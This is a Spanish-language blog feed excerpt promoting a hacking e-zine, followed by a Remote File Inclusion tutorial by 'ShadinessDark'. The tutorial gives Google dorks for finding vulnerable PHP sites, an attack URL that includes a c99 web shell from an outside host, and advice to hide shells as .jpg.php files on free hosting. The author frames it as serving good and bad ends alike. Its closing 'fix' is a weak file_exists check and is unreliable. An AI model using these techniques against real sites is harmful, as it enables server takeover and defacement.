dejo una revista que he sacado con mi grupo de compañeros espero sea a sus gustos los comentarios y las criticas son importantes saludos...</b><br /><br /><span style="font-weight: bold; color: rgb(255, 0, 0);">Descarga:</span><br /><span style="font-weight: bold; color: rgb(255, 0, 0);"> http://www.megaupload.com/?d=3LKL63GE</span><br /><br /><b>- Hacking Google (Hacking)<br />- Los Antivirus (Seguridad Informatica)<br />- Introduccion a la Programacion .NET (Programacion General)<br />- Batch Part. I (Programacion Scripting)<br />- Conceptos Basicos (Bug & Exploits)<br />- Atacando sistemas informacion webs basados en Cookies (BuG & Exploits)<br />- Introduccion a la Seguridad Web (Seguridad Web)<br />- HTML (Programacion Web)<br />- Introduccion a la Redes Informaticas (Redes)<br />- Mantener en buen estado la PC (Mantenimiento de PC's)<br />- Crear un texto con un efecto fuego realista. (Diseño Grafico)<br />- Diseño Blending para Web’s 2.0 (Diseño Grafico)<br />- Cambiar el color de Ojos (Diseño Grafico)<br />- Despedida</b><br /><span style="font-weight: bold;"><br /></span><br /></div>ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-46284019560632769192009-09-05T20:47:00.000-07:002009-09-05T20:48:13.876-07:00[Tutorial] RFI By ShadinessDarkTutorial remote file inclusion<br /><br />1.) Presentación<br /><br />2.) Que es RFI<br /><br />3.) Dorks RFI<br /><br />4.) Testeando la vulnerabilidad<br /><br />5.) Sacando una conclusión a todo<br /><br />6.) Como cuidar nuestra Web de este tipo de ataques<br /><br />7.) Despedida<br /><br /><br />1.) Presentación<br /><br />Primero que nada este tutorial va dedicado a mis amigos de BugDox y a todo los Lectores especialmente a los que no les caigo bien, muchos me harán criticas Y eso es Bueno porque Uds. Me corrigen como muchos saben yo me retire del DEFACING no Es que yo sea conocido ni nada por el estilo este tutorial lo he hecho de manera especial<br />Para dar la diferencia de otros tutoriales que he visto en la red…<br /><br />¿Por qué diferente?<br /><br />Porque la mayoría de los tutoriales visto en la red son poco explicados para iniciados<br /><br />¿A que se debe este tutorial?<br /><br />Bueno este tutorial no puedo decir que lo hago con el fin de bien lo hago para bien y Para mal lo hago con concepto de cómo explotarlo y concepto de cómo arreglarlo<br />No es mi culpa que un Web Master no me haga caso ¿Verdad?<br /><br />Los saludos más especiales para mis compañeros:<br /><br />Zero Bits<br />KuTer<br />Jeferx<br />Darki113r<br />_84kur10_<br />Z1z30f<br />Kozmic.Kizz<br />Zonithahack<br />3mp3z@nd0<br /><br />2.) Que es RFI<br /><br />RFI tiene como nombre Remote File Inclusión en español inclusión remota de archivo<br />Como ya saben que dice en la wikipedia esta vulnerabilidad se encuentra en páginas<br />Dinámicas ósea echas en PHP no en todo tipo de Web como saben siempre es depende<br />Del buen programador esta vulnerabilidad se encuentra en include() casi siempre<br />Buscamos en los códigos de fuentes por eso es bueno estar pendiente de nuestra Programación cuando tenemos un sitio Web, Un atacante puede inyectar su código<br />En un programa PHP en su servidor, Cuando acceden al servidor pueden acceder a Cualquier que tiene el programa PHP por ejemplo:<br /><br />Base de datos<br />Archivos de contraseña<br />Y otras cosas<br /><br />Pueden instalar sus propios servidores que lo ejecutan con los privilegios de la victima<br />Del servidor Web como {apache o httpd} Y si el servidor no lo han modificado en algunos locales de la vulnerabilidad de escalada de privilegios el atacante que monto<br />La shell puede ser usada para convertirse en root… <br /><br />3.) Dorks RFI<br /><br />Con un dork podemos conseguir las vulnerabilidades al azar con solo visitar<br />Www.Google.com y poner lo siguiente:<br /><br /><br />/index.inc.php?PATH_Includes=<br /><br />/ashnews.php?pathtoashnews=<br /><br />Uno de estos dos les servirá si no visiten Aqui<br /><br /><br />4.) Testeando la vulnerabilidad<br /><br />Bueno ya hemos encontrado una Web ahora vamos a testearla haber si es vulnerable<br />Primero que nada muchas veces esto se encuentra con solo revisar en los códigos de Fuente siempre se encuentra lo siguiente:<br /><br /><br />Código:<br /><br /><?php<br /><br /> include"#bugdox"; <br /><br />?><br /><br /><br />Recordemos que esta vulnerabilidad se presenta cuando se intenta meter una página<br />Remota adentro de la otra y se utilizan lo códigos que di como ejemplo cuando se Encuentra la Vulnerabilidad.include() lo que hace es incluir una pagina remota por ejemplo $Bugdox<br /><br />Se puede utilizar una url bajo argumento y eso es lo que hace explotar RFI por ejemplo:<br />Código:<br /><br />http://vulnerable.com/badcode?ejemplo= <br /><br /><br />tenemos ?ejemplo.php cuando el atacante introduce su codigo malicioso.<br />Citar<br />http://vulnerable.com/badcode?ejemplo=http://Www.xD.com/c99.jpg <br /><br />Www.xD.com es la Web donde subí mi SHELL con el nombre c99.jpg<br /><br />Al ejecutar esto en la Web de la victima ¿Qué pasa? No recoge ejemplo.php<br />Si no que el sistema agarra la url maligna que es la que le da una CONEXIÓN REMOTA que es cuando introducimos nuestra shell ¿Me entienden?.Un atacante<br />Puede saber controlar las variables de PHP se hace mediante:<br /><br />Código:<br /><br />mis-PHP register_globals función.<br /><br /><br />Cuando register_globals esta habilitado en PHP el lenguaje automagicamente<br />Hace una instancia con los valores de las variables de la petición en http, y los pone<br />En el espacio de nombres del programa PHP.<br /><br />Cuando se activa se le permite a un atacante inyectar un valor para cualquier variable Sin inicializar en cualquier programa solo el atacante añade un parámetro GET al final De la url es decir después de “=”<br /><br />Ejemplo hemos entrado en Www.xD.com hemos mirado el código de fuente<br />Hemos observado que tiene include() hacemos la prueba:<br />Código:<br /><br />http://vulnerable.com/badcode?ejemplo=http://Www.google.com <br /><br /><br />Resulta que al darle clic nos redirección a GOOGLE de una vez ya sabemos que la Web Es vulnerable a RFI.<br /><br />Luego que encontramos nuestra Web vulnerable buscamos nuestra SHELL<br />Ya sea c99 o r57 y hay otras mas.<br /><br />Buscamos un hosting gratuito que soporte PHP y guardamos nuestra shell en un<br />Jpg.php o con gif.php no importa el formato porque tampoco que vamos a poner<br />Cualquier formato a veces muchas Web no permiten extracciones como gif y otras…<br /><br />5.) Sacando una conclusión a todo<br /><br />Como pueden ver la lógica rfi no es muy difícil es un ataque muy básico<br />Trata de que www.xD.com es la Web vulnerable bugdox.php esta es la que<br />Incluirá el redireccionamiento ?ejemplo= Esta es la que le permite a un atacante<br />Introducir códigos maliciosos por ejemplo la SHELL y www.xD.com/c99_jpg<br />Este sitio es el que almacena la shell...<br /><br />6.) Como cuidar nuestra Web de este tipo de ataques<br /><br />Para evitar este tipo de ataques en nuestros sitios podemos ir al FTP y buscar<br />La configuración index.php lo editamos y agregamos lo siguiente:<br /><br />Antes de continuar este CODIGO de seguridad no es hecho por mi lo pueden ver<br />Aquí…<br /><br />Codigo:<br /><br />if (file_exists($_GET['id'].".php")) {<br />include ($_GET['id'].".php");<br />} else {<br />echo "El acceso a este lugar lo tiene denegado o no existe";<br />}<br /><br />Ejemplo de codigo:<br /><br />echo "El acceso a este lugar lo tiene denegado o no existe";<br /><br />Este if funciona de la manera que si al colocar:<br /><br />http://vulnerable.com/badcode?ejemplo=http://Www.google.com<br /><br />No te redireccionara si no que te dirá El acceso a este lugar lo tiene desnegado o no Existe pero si por ejemplo agregamos:<br /><br />http://vulnerable.com/badcode?ejemplo=BugDox<br /><br />Y si existe pasara normalmente sin dar el error para que no de el Error este archivo debe existir.<br /><br />7.) Despedida<br /><br />Otro tutorial mas que hago no es la gran cosa a lo mejor tengo errores por hay<br />Si los tengo me gustarian las {Criticas} Son muy importante para correjir a los<br />Demas...<br /><br />No pongo mi sitio Web porque siempre los Web Master andan con el trauma de que<br />Hacemos Spam como si con eso piensan que acabaran el Spam sueñen un rato…<br /><br />Group’s Ethical.<br /><br />Zero Bits<br />KuTer<br />Jeferx<br />Darki113r<br />_84kur10_<br />ShadinessDark<br /><br />Mi team V1rtu@l VIRu$ Bl@ck Team<br />By ShadinessDarkShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com1